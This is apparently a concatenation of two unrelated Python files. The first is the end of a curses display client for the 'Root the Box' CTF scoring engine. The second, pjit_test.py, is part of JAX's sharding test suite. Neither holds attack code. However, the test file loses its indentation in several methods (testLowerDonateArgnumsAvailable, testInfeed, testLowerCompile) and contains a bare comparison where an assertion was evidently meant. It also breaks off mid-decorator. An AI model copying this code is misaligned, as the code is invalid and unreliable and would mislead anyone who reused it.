        self.screen.refresh()
        # (6) Matrix animation
        matrix = " > The matrix has you ... follow the white rabbit "
        for index in range(0, len(matrix)):
            time.sleep(0.2)
            self.screen.addstr(6, 2, matrix[:index])
            self.screen.refresh()
            if self.stop_thread:
                return

    def progress(self):
        """ Progress animation, executed as separate thread """
        index = 0
        progress_bar = ["=--", "-=-", "--=", "-=-"]
        pong_string = "PNG"
        while not self.stop_thread:
            if self.pong:
                # Flash "PNG" in white-on-red when a ping/pong was seen.
                self.screen.addstr(self.max_y - 1, 3, "[")
                self.screen.addstr(
                    self.max_y - 1, 4, pong_string, curses.color_pair(self.WHITE_RED)
                )
                self.screen.addstr(self.max_y - 1, 7, "]")
                self.pong = False
            else:
                index += 1
                progress_string = "[%s]" % (progress_bar[index % len(progress_bar)])
                self.screen.addstr(self.max_y - 1, 3, progress_string)
            display_time = "[ %s ]" % current_time()
            self.screen.addstr(
                self.max_y - 1, (self.max_x - len(display_time)) - 3, display_time
            )
            self.screen.refresh()
            time.sleep(0.2)

    def auth_failure(self, msg):
        """ Display authentication failure message, blink it, then exit """
        logging.info("Displaying auth failure message")
        self.__clear__()
        self.screen.refresh()
        prompt = " *** %s *** " % msg
        access_denied = curses.newwin(
            3, len(prompt) + 2, (self.max_y / 2) - 1, ((self.max_x - len(prompt)) / 2)
        )
        access_denied.addstr(1, 1, prompt, curses.A_BOLD | curses.color_pair(self.RED))
        access_denied.refresh()
        time.sleep(0.75)
        # Blink the message five times before exiting.
        for index in range(0, 5):
            access_denied.addstr(1, 1, " " * len(prompt))
            access_denied.refresh()
            time.sleep(0.25)
            access_denied.addstr(
                1, 1, prompt, curses.A_BOLD | curses.color_pair(self.RED)
            )
            access_denied.refresh()
            time.sleep(0.75)
        self.stop()
###################
# > Main Entry
###################
def main(domain, port, secure, log_file, log_level):
    """ Creates and starts the monitor.

    domain/port: scoring-engine address; secure selects wss:// over ws://.
    log_file: path for the FileHandler; log_level: lowercased level name.
    """
    hdlr = logging.FileHandler(log_file)
    formatter = logging.Formatter("\r[%(levelname)s] %(asctime)s - %(message)s")
    hdlr.setFormatter(formatter)
    logger.addHandler(hdlr)
    # Bug fix: the fallback used to be the *string* "notset", which
    # Logger.setLevel() rejects with ValueError for unknown level names;
    # fall back to the numeric logging.NOTSET instead.
    lvl = LOG_LEVELS.get(log_level, logging.NOTSET)
    logger.setLevel(lvl)
    enableTrace(True)
    scheme = "wss" if secure else "ws"
    url = "%s://%s:%s%s" % (scheme, domain, port, __path__)
    logging.info("Connecting to %s" % url)
    bot_monitor = BotMonitor(url)
    try:
        bot_monitor.start()
    except KeyboardInterrupt:
        # Let animation threads notice the flag before hard-exiting.
        bot_monitor.stop_thread = True
        time.sleep(0.2)
        os._exit(0)
if __name__ == "__main__":
    import argparse

    # Command-line interface; all values are forwarded to main().
    parser = argparse.ArgumentParser(description="Root the Box: Botnet Monitor")
    parser.add_argument(
        "--version", action="version", version="%(prog)s v" + __version__
    )
    parser.add_argument(
        "--secure",
        help="connect using a ssl (default: false)",
        action="store_true",
        dest="secure",
    )
    parser.add_argument(
        "--domain",
        "-d",
        help="scoring engine ip address, or domain (default: %s)" % __domain__,
        default=__domain__,
        dest="domain",
    )
    parser.add_argument(
        "--port",
        "-p",
        help="network port to connect to (default: %s)" % __port__,
        default=__port__,
        dest="port",
    )
    parser.add_argument(
        "--log-file",
        "-f",
        help="log to file (default: %s)" % __log__,
        default=__log__,
        dest="log_file",
    )
    parser.add_argument(
        "--log-level",
        "-l",
        # Bug fix: this help text was copy-pasted from --log-file; it
        # actually sets the logging level.
        help="logging level (default: notset)",
        default="notset",
        dest="log_level",
    )
    args = parser.parse_args()
    main(args.domain, args.port, args.secure, args.log_file, args.log_level.lower())
|
pjit_test.py | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import re
from functools import partial
import logging
import threading
import unittest
from collections import OrderedDict, namedtuple
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
import jax
import jax.numpy as jnp
from jax._src import test_util as jtu
from jax.errors import JAXTypeError
from jax import lax
# TODO(skye): do we still wanna call this PartitionSpec?
from jax.experimental import maps
from jax.experimental import PartitionSpec as P
from jax.experimental.maps import xmap
from jax.experimental import global_device_array
import jax.experimental.pjit as pjit_lib
from jax.experimental.pjit import (pjit, pjit_p, with_sharding_constraint,
SpecSync, FROM_GDA)
from jax.interpreters import pxla
from jax.interpreters import xla
from jax._src.lib import xla_client, xla_extension_version, xla_bridge
from jax._src.util import prod, curry, unzip2, safe_zip
from jax.config import config
config.parse_flags_with_absl()

# With a new-enough jaxlib the tests emulate a multi-device CPU; remember the
# user's original XLA_FLAGS here so tearDownModule can restore them.
if xla_extension_version >= 60:
  prev_xla_flags = None
def setUpModule():
  """One-time module setup for the pjit tests.

  On jaxlib extension version >= 60, force the CPU backend to expose 8
  virtual devices so the mesh-based tests can run anywhere; on older
  versions, require a real GPU/TPU backend. Always enables SPMD lowering.
  """
  if xla_extension_version >= 60:
    global prev_xla_flags
    prev_xla_flags = os.getenv("XLA_FLAGS")
    flags_str = prev_xla_flags or ""
    # Don't override user-specified device count, or other XLA flags.
    if "xla_force_host_platform_device_count" not in flags_str:
      os.environ["XLA_FLAGS"] = (flags_str +
                                 " --xla_force_host_platform_device_count=8")
    # Clear any cached backends so new CPU backend will pick up the env var.
    xla_bridge.get_backend.cache_clear()
  else:
    if jax.default_backend() not in {'gpu', 'tpu'}:
      raise unittest.SkipTest("pjit only supports GPU and TPU backends")
  jtu.set_spmd_lowering_flag(True)
def tearDownModule():
  """Undo setUpModule: restore the caller's XLA_FLAGS and SPMD lowering flag."""
  if xla_extension_version >= 60:
    if prev_xla_flags is None:
      del os.environ["XLA_FLAGS"]
    else:
      os.environ["XLA_FLAGS"] = prev_xla_flags
    # Drop cached backends so the restored flags take effect.
    xla_bridge.get_backend.cache_clear()
  jtu.restore_spmd_lowering_flag()
def create_gda(global_shape, global_mesh, mesh_axes):
  """Build a GlobalDeviceArray whose global contents are arange(prod(shape))."""
  flat_values = np.arange(prod(global_shape), dtype=np.float32)
  host_data = flat_values.reshape(global_shape)
  return global_device_array.GlobalDeviceArray.from_callback(
      global_shape, global_mesh, mesh_axes, lambda index: host_data[index])
@curry
def check_1d_2d_mesh(f, set_mesh):
  """Parameterize test `f` over a 1D 2-device mesh and 2x1 / 2x2 2D meshes.

  When `set_mesh` is true the mesh is also installed around the test via
  jtu.with_mesh_from_kwargs; otherwise the test only receives the mesh spec
  through its `mesh` / `resources` parameters.
  """
  return parameterized.named_parameters(
      {"testcase_name": "_" + name, "mesh": mesh, "resources": resources}
      for name, mesh, resources in (
          ("2", (("x", 2),), "x"),
          ("2x1", (("x", 2), ("y", 1)), ("x", "y")),
          ("2x2", (("x", 2), ("y", 2)), ("x", "y")),
      ))(jtu.with_mesh_from_kwargs(f) if set_mesh else f)
# TODO(skye): make the buffer donation utils part of JaxTestCase
class PJitTest(jtu.BufferDonationTestCase):
  """Tests for pjit sharding, constraints, lowering, vmap and caching."""

  @jtu.with_mesh([('x', 1)])
  def testDeviceBufferAval(self):
    """pjit on a 1-device mesh yields a sharded output with a single buffer."""
    @partial(pjit, in_axis_resources=None, out_axis_resources=P('x'))
    def f(x):
      return x
    shape = (2, 2)
    x = np.arange(prod(shape), dtype=np.float32).reshape(shape)
    actual = f(x)
    expected = x
    self.assertAllClose(actual, expected, check_dtypes=False)
    self.assertIsInstance(actual, pxla.ShardedDeviceArray)
    self.assertLen(actual.device_buffers, 1)
    self.assertAllClose(
        actual.device_buffers[0].to_py(), expected, check_dtypes=False)
    # Repro for a bug on device_buffer aval
    _ = repr(actual.device_buffers)

  @jtu.with_mesh([('x', 2)])
  def testBasic1D(self):
    """Elementwise add with both inputs sharded along a 2-device 1D mesh."""
    @partial(pjit,
             in_axis_resources=(P('x'), P('x')),
             out_axis_resources=None)
    def f(x, y):
      return x + y
    shape = (8, 8)
    x = np.arange(prod(shape), dtype=np.float32).reshape(shape)
    actual = f(x, x + 1)
    expected = x + (x + 1)
    self.assertAllClose(actual, expected, check_dtypes=False)
    self.assertIsInstance(actual, pxla.ShardedDeviceArray)
    self.assertLen(actual.device_buffers, 2)
    # Output is replicated (out_axis_resources=None): each buffer holds it all.
    self.assertAllClose(actual.device_buffers[0].to_py(), expected,
                        check_dtypes=False)

  @jtu.with_mesh([('x', 2)])
  def testUnevenShardingConstraint(self):
    """Sharding constraints on a size that doesn't divide the mesh evenly."""
    @partial(pjit,
             in_axis_resources=(P('x'), P('x')),
             out_axis_resources=None)
    def f(x, y):
      x = x[:3]
      y = y[:3]
      x = with_sharding_constraint(x, P('x'))
      y = with_sharding_constraint(y, P('x'))
      out = x + y
      return jnp.pad(out, [[0, 1]])
    shape = (4,)
    x = np.arange(prod(shape), dtype=np.float32).reshape(shape)
    actual = f(x, x + 1)
    expected = x + (x + 1)
    # Only the first 3 elements are meaningful; the last one is padding.
    self.assertAllClose(actual[:3], expected[:3], check_dtypes=False)
    self.assertIsInstance(actual, pxla.ShardedDeviceArray)
    self.assertLen(actual.device_buffers, 2)
    self.assertAllClose(actual.device_buffers[0].to_py()[:3], expected[:3],
                        check_dtypes=False)

  def testBasic1DWithMeshContextManager(self):
    """Same as testBasic1D, but the mesh is installed via a context manager."""
    @partial(pjit,
             in_axis_resources=(P('x'), P('x')),
             out_axis_resources=None)
    def f(x, y):
      return x + y
    shape = (8, 8)
    x = np.arange(prod(shape), dtype=np.float32).reshape(shape)
    # NOTE(review): ('x') is just the string 'x', not a 1-tuple; it works
    # because axis names get iterated -- ('x',) would be clearer.
    with jtu.create_global_mesh((2,), ('x')) as mesh:
      actual = f(x, x + 1)
    expected = x + (x + 1)
    self.assertEqual(mesh, jtu.create_global_mesh((2,), ('x')))
    self.assertAllClose(actual, expected, check_dtypes=False)
    self.assertIsInstance(actual, pxla.ShardedDeviceArray)
    self.assertLen(actual.device_buffers, 2)
    self.assertAllClose(actual.device_buffers[0].to_py(), expected,
                        check_dtypes=False)
  @jtu.with_mesh([('x', 2), ('y', 2)])
  def testBasic2D(self):
    """Matmul with inputs sharded over a 2x2 mesh; output sharded on 'x'."""
    @partial(pjit,
             in_axis_resources=(P(None, 'x', 'y'), P('y')),
             out_axis_resources=P('x'))
    def f(x, y):
      return x @ y
    x_shape = (8, 6, 4)
    y_shape = (4, 2)
    x = jnp.arange(np.prod(x_shape)).reshape(x_shape)
    y = jnp.arange(np.prod(y_shape)).reshape(y_shape)
    actual = f(x, y)
    expected = x @ y
    self.assertAllClose(actual, expected, check_dtypes=False)
    self.assertIsInstance(actual, pxla.ShardedDeviceArray)
    self.assertLen(actual.device_buffers, 4)
    # Output is halved along 'x' and replicated along 'y', so buffer pairs
    # (0,1) and (2,3) hold the same half.
    split0, split1 = np.split(expected, 2)
    self.assertAllClose(actual.device_buffers[0].to_py(), split0,
                        check_dtypes=False)
    self.assertAllClose(actual.device_buffers[1].to_py(), split0,
                        check_dtypes=False)
    self.assertAllClose(actual.device_buffers[2].to_py(), split1,
                        check_dtypes=False)
    self.assertAllClose(actual.device_buffers[3].to_py(), split1,
                        check_dtypes=False)

  def testBasic2DWithMeshContextManager(self):
    """Same as testBasic2D, with the mesh supplied by a context manager."""
    @partial(pjit,
             in_axis_resources=(P(None, 'x', 'y'), P('y')),
             out_axis_resources=P('x'))
    def f(x, y):
      return x @ y
    x_shape = (8, 6, 4)
    y_shape = (4, 2)
    x = jnp.arange(np.prod(x_shape)).reshape(x_shape)
    y = jnp.arange(np.prod(y_shape)).reshape(y_shape)
    mesh = jtu.create_global_mesh((2, 2), ('x', 'y'))
    with mesh:
      actual = f(x, y)
    expected = x @ y
    self.assertAllClose(actual, expected, check_dtypes=False)
    self.assertIsInstance(actual, pxla.ShardedDeviceArray)
    self.assertLen(actual.device_buffers, 4)
    split0, split1 = np.split(expected, 2)
    self.assertAllClose(actual.device_buffers[0].to_py(), split0,
                        check_dtypes=False)
    self.assertAllClose(actual.device_buffers[1].to_py(), split0,
                        check_dtypes=False)
    self.assertAllClose(actual.device_buffers[2].to_py(), split1,
                        check_dtypes=False)
    self.assertAllClose(actual.device_buffers[3].to_py(), split1,
                        check_dtypes=False)

  def testDifferentNestedMesh(self):
    """Nested `with mesh` blocks install and restore the active mesh."""
    with jtu.create_global_mesh((2, 1), ("x", "y")) as m1:
      with jtu.create_global_mesh((2, 2), ("a", "b")) as m2:
        self.assertEqual(pxla.thread_resources.env.physical_mesh, m2)
      self.assertEqual(pxla.thread_resources.env.physical_mesh, m1)
    self.assertEqual(pxla.thread_resources.env.physical_mesh,
                     pxla.EMPTY_ENV.physical_mesh)

  def testSameNestedMesh(self):
    """Re-entering the same mesh context twice nests and unwinds cleanly."""
    mesh = jtu.create_global_mesh((2, 1), ("a", "b"))
    with mesh as m1:
      with mesh as m2:
        self.assertEqual(pxla.thread_resources.env.physical_mesh, m2)
      self.assertEqual(pxla.thread_resources.env.physical_mesh, m1)
    self.assertEqual(pxla.thread_resources.env.physical_mesh,
                     pxla.EMPTY_ENV.physical_mesh)

  def testMeshDecorator(self):
    """maps.Mesh can also be applied as a decorator around a pjit call."""
    x = jnp.arange(8)
    mesh_shape = (2, 2)
    size = prod(mesh_shape)
    if len(jax.devices()) < size:
      raise unittest.SkipTest(f"Test requires {size} global devices.")
    mesh_devices = np.array(jax.devices()[:size]).reshape(mesh_shape)

    @maps.Mesh(mesh_devices, ('x', 'y'))
    def dec():
      return pjit(lambda x: x, in_axis_resources=P('x'), out_axis_resources=None)(x)
    out = dec()
    self.assertArraysEqual(out, x)
  @jtu.with_mesh([('x', 2), ('y', 2)])
  def testTwoMeshAxisSharding(self):
    """Shard a single array dimension across both mesh axes at once."""
    @partial(pjit,
             in_axis_resources=P(('x', 'y'),),
             out_axis_resources=P(('x', 'y'),))
    def f(x, y):
      return x @ y
    shape = (8, 8)
    x = jnp.arange(np.prod(shape)).reshape(shape)
    actual = f(x, x + 1)
    expected = x @ (x + 1)
    self.assertAllClose(actual, expected, check_dtypes=False)
    self.assertIsInstance(actual, pxla.ShardedDeviceArray)
    self.assertLen(actual.device_buffers, 4)
    # Rows are split four ways across the flattened ('x', 'y') axis.
    splits = np.split(expected, 4)
    self.assertAllClose(actual.device_buffers[0].to_py(), splits[0],
                        check_dtypes=False)
    self.assertAllClose(actual.device_buffers[1].to_py(), splits[1],
                        check_dtypes=False)
    self.assertAllClose(actual.device_buffers[2].to_py(), splits[2],
                        check_dtypes=False)
    self.assertAllClose(actual.device_buffers[3].to_py(), splits[3],
                        check_dtypes=False)

  @jtu.with_mesh([('x', 2)])
  def testBufferDonation(self):
    """donate_argnums frees the donated input buffer but not the other one."""
    if jax.default_backend() not in {'gpu', 'tpu'}:
      raise unittest.SkipTest('Buffer donation only supported on GPU and TPU')

    @partial(pjit,
             in_axis_resources=P('x'),
             out_axis_resources=P('x'),
             donate_argnums=0)
    def f(x, y):
      return x + y

    shard = pjit(lambda x: x, in_axis_resources=P('x'),
                 out_axis_resources=P('x'))
    x = shard(jnp.ones((2, 5)) * 4)
    y = shard(jnp.ones((2, 5)) * 2)
    expected = x + y
    self.assertAllClose(f(x, y), expected)
    self.assertNotDeleted(y)
    self.assertDeleted(x)

  @jtu.with_mesh([('x', 2), ('y', 1)])
  def testShardingConstraint(self):
    """with_sharding_constraint annotations show up in the generated HLO."""
    @partial(pjit, in_axis_resources=None, out_axis_resources=None)
    def f(x):
      y = x + 1
      y = with_sharding_constraint(y, P('x', 'y'))
      return y * 2

    shape = (8, 8)
    x = np.arange(prod(shape)).reshape(shape)
    expected = (x + 1) * 2
    actual = f(x)
    self.assertAllClose(actual, expected, check_dtypes=False)
    self.assertIsInstance(actual, pxla.ShardedDeviceArray)
    self.assertLen(actual.device_buffers, 2)
    self.assertAllClose(actual.device_buffers[0].to_py(), expected,
                        check_dtypes=False)

    hlo = jax.xla_computation(f)(np.ones(shape))
    # Annotation from with_sharding_constraint
    self.assertIn("sharding={devices=[2,1]0,1}", hlo.as_hlo_text())
    # Annotation from pjit
    self.assertIn("sharding={replicated}", hlo.as_hlo_text())
  @jtu.with_mesh([('x', 2), ('y', 1)])
  def testShardingConstraintPyTree(self):
    """with_sharding_constraint applied to a pytree of arrays."""
    @partial(pjit, in_axis_resources=None, out_axis_resources=None)
    def f(x):
      x = with_sharding_constraint(x, [P('x', 'y'), P('y', 'x')])
      x = x.copy()
      x[0]["a"] *= 2
      return x

    shape = (8, 8)
    v = np.arange(prod(shape)).reshape(shape)
    x = [{"a": v, "b": v * 2}, v * 3]

    actual = f(x)
    expected = x.copy()
    expected[0]["a"] *= 2
    self.assertAllClose(actual, expected, check_dtypes=False)
    self.assertLen(actual[0]["a"].device_buffers, 2)

    hlo = jax.xla_computation(f)(x)
    # Annotations from with_sharding_constraint
    self.assertIn("sharding={devices=[2,1]0,1}", hlo.as_hlo_text())
    self.assertIn("sharding={devices=[1,2]0,1}", hlo.as_hlo_text())
    # Annotation from pjit
    self.assertIn("sharding={replicated}", hlo.as_hlo_text())

  @jtu.with_mesh([('x', 2), ('y', 2)])
  def testShardingConstraintPyTreeWithUnconstrainedDims(self):
    """P.UNCONSTRAINED dims surface as unspecified_dims in the MHLO."""
    @partial(pjit, in_axis_resources=None, out_axis_resources=None)
    def f(x):
      x = with_sharding_constraint(
          x, [P(P.UNCONSTRAINED, 'y', None),
              P('x', P.UNCONSTRAINED, None)])
      x = x.copy()
      x[0]['a'] *= 2
      return x

    shape = (2, 8, 8)
    v = np.arange(prod(shape)).reshape(shape)
    x = [{'a': v, 'b': v * 2}, v * 3]

    actual = f(x)
    expected = x.copy()
    expected[0]['a'] *= 2
    self.assertAllClose(actual, expected, check_dtypes=False)
    self.assertLen(actual[0]['a'].device_buffers, 4)

    mhlo_str = str(f.lower(x).compiler_ir(dialect="mhlo"))
    self.assertIn("unspecified_dims=[0]", mhlo_str)
    self.assertIn("unspecified_dims=[1]", mhlo_str)

  def testCaching(self):
    """pjit retraces only once; an identical re-created mesh reuses the cache."""
    def f(x):
      # Flag flipped by the test body to detect (un)expected retracing.
      assert should_be_tracing
      return jnp.sin(x) * 2

    x = np.arange(16).reshape(4, 4)
    devices = np.array(list(jax.local_devices())[:4])
    if devices.size < 4:
      raise unittest.SkipTest("Test requires 4 devices")
    devices = devices.reshape((2, 2))
    with maps.Mesh(devices, ('x', 'y')):
      should_be_tracing = True
      pjit(f, in_axis_resources=P(('x', 'y')), out_axis_resources=None)(x)
      should_be_tracing = False
      pjit(f, in_axis_resources=P(('x', 'y')), out_axis_resources=None)(x)
    # Re-create the mesh to make sure that has no influence on caching
    with maps.Mesh(devices, ('x', 'y')):
      should_be_tracing = False
      pjit(f, in_axis_resources=P(('x', 'y')), out_axis_resources=None)(x)
  @jtu.with_mesh([('x', 2), ('y', 1)])
  def testNested(self):
    """A pjit nested inside another pjit computes correctly."""
    # Add a constant captured by the nested pjit to make things more complicated
    h = jnp.arange(4)
    f = pjit(lambda x: x.sum() + h.sum(), in_axis_resources=P('x', 'y'), out_axis_resources=None)
    g = pjit(lambda x: f(jnp.sin(x)), in_axis_resources=P('x', None), out_axis_resources=None)
    x = jnp.arange(16).reshape((4, 4))
    y = g(x)
    self.assertAllClose(y, jnp.sin(x).sum() + h.sum())
    self.assertTrue(hasattr(y, "sharding_spec"))

  @check_1d_2d_mesh(set_mesh=True)
  def testAutodiff(self, mesh, resources):
    """check_grads through nested pjit calls (only the 2D mesh cases run)."""
    if len(mesh) != 2: return
    assert resources == ('x', 'y')
    # Add a constant captured by the nested pjit to make things more complicated
    h = jnp.arange(4)
    f = pjit(lambda x: x.sum(1) * h.sum(),
             in_axis_resources=P('x', 'y'), out_axis_resources=P(('x', 'y')))
    g = pjit(lambda x: f(jnp.sin(x * 4 + 2)),
             in_axis_resources=P('x', None), out_axis_resources=P(('x', 'y')))
    jtu.check_grads(g, (jnp.arange(16, dtype=jnp.float32).reshape((4, 4)) / 100,),
                    order=2)

  @jtu.with_mesh([('x', 2), ('y', 1)])
  def testEvalJaxpr(self):
    """A pjit jaxpr can be re-evaluated via jax.core.jaxpr_as_fun."""
    x, y = jnp.arange(4), jnp.arange(5)
    f = pjit(lambda x, y: x.sum() + jnp.sin(y),
             in_axis_resources=(P('x'), P('y')),
             out_axis_resources=P('y'))
    f_jaxpr = jax.make_jaxpr(f)(x, y)
    f_eval = jax.core.jaxpr_as_fun(f_jaxpr)
    r, = f_eval(x, y)
    self.assertAllClose(r, x.sum() + jnp.sin(y))

  @jtu.with_mesh([('x', 2)])
  def testNonArrayArg(self):
    """pjit accepts plain Python scalar arguments."""
    self.assertEqual(pjit(lambda x: x + 2,
                          in_axis_resources=None,
                          out_axis_resources=None)(1), 3)

  @jtu.with_mesh([('x', 2)])
  def testNonHashableAxisResources(self):
    """Axis resources may be non-hashable pytrees (dicts of PartitionSpecs)."""
    x = jnp.arange(4)
    y = pjit(lambda x: {'b': x['a'] + 2},
             in_axis_resources=({'a': P('x')},),
             out_axis_resources={'b': P('x')})({'a': x})
    self.assertAllClose(y, {'b': x + 2})

  @jtu.with_mesh([('x', 2)])
  def testGradOfConstraint(self):
    """Gradients flow through with_sharding_constraint."""
    # Make sure that we can compute grads through sharding constraints
    h = lambda x: jnp.sin(with_sharding_constraint(x, P('x'))).sum()
    f = pjit(lambda x: jax.grad(h)(x),
             in_axis_resources=None, out_axis_resources=None)
    x = jnp.arange(8, dtype=jnp.float32)
    self.assertAllClose(f(x), jnp.cos(x))

  @jtu.with_mesh([('x', 2)])
  def testNoopPartitionSpecs(self):
    """Empty/None PartitionSpecs all behave as fully replicated no-ops."""
    noops = [P(), P(None), P(()), P((), None), P(None, None, ())]
    x = jnp.arange(8).reshape((2, 2, 2))
    for spec in noops:
      y = pjit(lambda x: x * 2, in_axis_resources=spec, out_axis_resources=spec)(x)
      self.assertAllClose(y, x * 2)
  @jtu.with_mesh([('x', 2)])
  def testVmapModifiesAxisResources(self):
    """vmap over pjit rewrites the in/out axis resources' SpecSync state."""
    h = pjit(lambda x, y: (x + y, x, y), in_axis_resources=P('x'), out_axis_resources=None)
    x = jnp.arange(4)
    y = jnp.arange(5*4).reshape((5, 4))
    jaxpr = jax.make_jaxpr(jax.vmap(h, in_axes=(None, 0)))(x, y).jaxpr
    eqn = jaxpr.eqns[0]
    self.assertIs(eqn.primitive, pjit_p)
    x_sync, y_sync = (spec.sync for spec in eqn.params['in_axis_resources'])
    self.assertEqual(x_sync, SpecSync.IN_SYNC)
    self.assertEqual(y_sync, SpecSync.DIM_PERMUTE)
    x_sync, y_sync, z_sync = (spec.sync for spec in eqn.params['out_axis_resources'])
    self.assertEqual(x_sync, SpecSync.DIM_PERMUTE)
    self.assertEqual(y_sync, SpecSync.IN_SYNC)
    self.assertEqual(z_sync, SpecSync.DIM_PERMUTE)

  @jtu.with_mesh([('x', 2)])
  def testVMap(self):
    """vmap of a pjit computes correctly and keeps the expected sharding."""
    f = pjit(lambda x, y: (x + y, x), in_axis_resources=P('x'), out_axis_resources=P('x'))
    x = jnp.arange(4)
    y = jnp.arange(5*4).reshape((5, 4))
    z, w = jax.vmap(f, in_axes=(None, 0), out_axes=(0, None))(x, y)
    self.assertAllClose(z, x[jnp.newaxis] + y)
    self.assertAllClose(w, x)
    self.assertEqual(z.sharding_spec.sharding, (pxla.NoSharding(), pxla.Chunked([2])))
    self.assertEqual(w.sharding_spec.sharding, (pxla.Chunked([2]),))

  @jtu.with_mesh([('x', 2)])
  def testVMapShardingConstraint(self):
    """vmap shifts a with_sharding_constraint spec past the batch dimension."""
    f = pjit(lambda x: with_sharding_constraint(x, P('x')),
             in_axis_resources=P(), out_axis_resources=P('x'))
    x = jnp.arange(5*4).reshape((5, 4))
    jaxpr = jax.make_jaxpr(jax.vmap(f))(x)
    pjit_eqn, = jaxpr.eqns
    constraint_eqn, = pjit_eqn.params['jaxpr'].eqns
    self.assertEqual(constraint_eqn.params['axis_resources'].partitions, (None, ('x',)))
    self.assertEqual(constraint_eqn.params['axis_resources'].sync, SpecSync.DIM_PERMUTE)

  @jtu.with_mesh([('x', 2), ('y', 1)])
  def testShardingInXMap(self):
    """A pjit nested in xmap sees the xmap axis in its in_axis_resources."""
    h = pjit(lambda x: x, in_axis_resources=P('x'), out_axis_resources=None)
    f = xmap(lambda x: h(x * 2), in_axes=['i', ...], out_axes=['i', ...],
             axis_resources={'i': 'y'})
    x = jnp.arange(16).reshape((4, 4))
    rule = xla._translations[pjit_p]
    test_rule_called = False
    def _test_rule(*args, **kwargs):
      nonlocal test_rule_called
      test_rule_called = True
      in_axis_resources = kwargs['in_axis_resources']
      self.assertEqual(len(in_axis_resources), 1)
      self.assertIn(('y',), in_axis_resources[0].partitions)
      return rule(*args, **kwargs)
    try:
      # Temporarily patch the translation rule to observe pjit's resources.
      xla._translations[pjit_p] = _test_rule
      f(x)
      self.assertTrue(test_rule_called)
    finally:
      xla._translations[pjit_p] = rule

  @jtu.with_mesh([('x', 2)])
  def testLowerWithDuckTyping(self):
    """lower() accepts ShapeDtypeStruct stand-ins instead of real arrays."""
    x = jax.ShapeDtypeStruct((2, 2), jnp.float32)
    # Make sure this doesn't crash
    pjit(lambda x: x + 4,
         in_axis_resources=P('x'), out_axis_resources=P('x')).lower(x)
@jtu.with_mesh([('x', 2)])
def testLowerDonateArgnumsAvailable(self):
x = jax.ShapeDtypeStruct((2, 2), jnp.float32)
def f(*args):
x, *_ = args
return x
f_low = pjit(f, donate_argnums=(0,),
in_axis_resources=P('x'), out_axis_resources=P('x')).lower(x)
f_com = f_low.compile()
f_low.donate_argnums == f_com.donate_argnums == (0,)
def testInfeed(self):
devices = np.array(jax.local_devices())
nr_devices = len(devices)
shape = (nr_devices * 3, nr_devices * 5)
def f_for_jit(x):
token = lax.create_token(x)
(y,), token = lax.infeed(
token, shape=(jax.ShapedArray(x.shape, np.float32),))
(z,), token = lax.infeed(
token, shape=(jax.ShapedArray(x.shape, np.float32),))
(w,), token = lax.infeed(
token, shape=(jax.ShapedArray(x.shape, np.float32),))
return x + y + z + w
x = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
y = x * 2.
z = x * 3.
w = x * 4.
# Transfer data to infeed before executing the function. For GPUs, the
# execution of the compiled function is blocking, so transferring data
# to infeed before executing ensures that the execution does not deadlock
# waiting for the infeed data.
logging.info('Transfering to infeed for the jit call')
d = devices[0]
d.transfer_to_infeed((y,))
d.transfer_to_infeed((z,))
d.transfer_to_infeed((w,))
# JIT
logging.info('Making jit call')
res0 = jax.jit(f_for_jit)(x)
self.assertAllClose(res0, x + y + z + w, check_dtypes=True)
# PJIT
def f_for_pjit(x):
token = lax.create_token(x)
# A replicated infeed
(y,), token = lax.infeed(
token,
shape=(jax.ShapedArray(x.shape, np.float32),),
partitions=(None,))
# An infeed sharded on first axis
(z,), token = lax.infeed(
token,
shape=(jax.ShapedArray(x.shape, np.float32),),
partitions=(P(nr_devices, 1),))
# An infeed sharded on second axis
(w,), token = lax.infeed(
token,
shape=(jax.ShapedArray(x.shape, np.float32),),
partitions=(P(1, nr_devices),))
return x + y + z + w
logging.info('Transfering to infeed for the pjit call')
for didx, d in enumerate(devices):
# Transfer the whole array to all devices for replicated.
d.transfer_to_infeed((y,))
# For sharded infeed, transfer only the needed slices to each device.
d.transfer_to_infeed((z[3 * didx:3 * didx + 3, :]))
d.transfer_to_infeed((w[:, 5 * didx:5 * didx + 5],))
with maps.Mesh(devices, ['d']):
logging.info('Making pjit call')
res = pjit(
f_for_pjit, in_axis_resources=(P('d'),), out_axis_resources=P('d'))(
x)
self.assertAllClose(res0, res, check_dtypes=True)
  def testOutfeed(self):
    """Outfeed from a pjit'd computation, replicated and sharded."""
    devices = np.array(jax.local_devices())
    nr_devices = len(devices)
    shape = (nr_devices * 3, nr_devices * 5)

    def f(x):
      token = lax.create_token(x)
      token = lax.outfeed(token, x, partitions=(None,))
      token = lax.outfeed(token, x, partitions=(P(nr_devices, 1),))
      token = lax.outfeed(token, x, partitions=(P(1, nr_devices),))
      return x

    x = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)

    def dispatch():
      with maps.Mesh(devices, ['d']):
        logging.info('Making pjit call')
        pjit(f, in_axis_resources=(P('d'),), out_axis_resources=P('d'))(x)
    # Run the computation on a background thread: the outfeed consumer below
    # must drain concurrently or the computation would block forever.
    execution = threading.Thread(target=dispatch)
    execution.start()

    def check_outfeed(d, x):
      y, = d.transfer_from_outfeed(
          xla_client.shape_from_pyval((x,)).with_major_to_minor_layout_if_absent())
      self.assertAllClose(x, y, check_dtypes=True)

    logging.info('Transfering from outfeed for the pjit call')
    for didx, d in enumerate(devices):
      # Transfer the whole array from all devices for replicated.
      check_outfeed(d, x)
      # For sharded outfeed, the results are sliced.
      check_outfeed(d, x[3 * didx:3 * didx + 3, :])
      check_outfeed(d, x[:, 5 * didx:5 * didx + 5])

    execution.join()

  @jtu.with_mesh([('x', 2)])
  def testWithCustomPRNGKey(self):
    """pjit accepts custom PRNG keys when jax_enable_custom_prng is on."""
    if not config.jax_enable_custom_prng:
      raise unittest.SkipTest("test requires jax_enable_custom_prng")
    key = jax.prng.seed_with_impl(jax.prng.rbg_prng_impl, 87)
    # Make sure this doesn't crash
    pjit(lambda x: x, in_axis_resources=(None), out_axis_resources=(None))(key)
@jtu.with_mesh([('x', 2), ('y', 2)])
def testLowerCompile(self):
@partial(pjit,
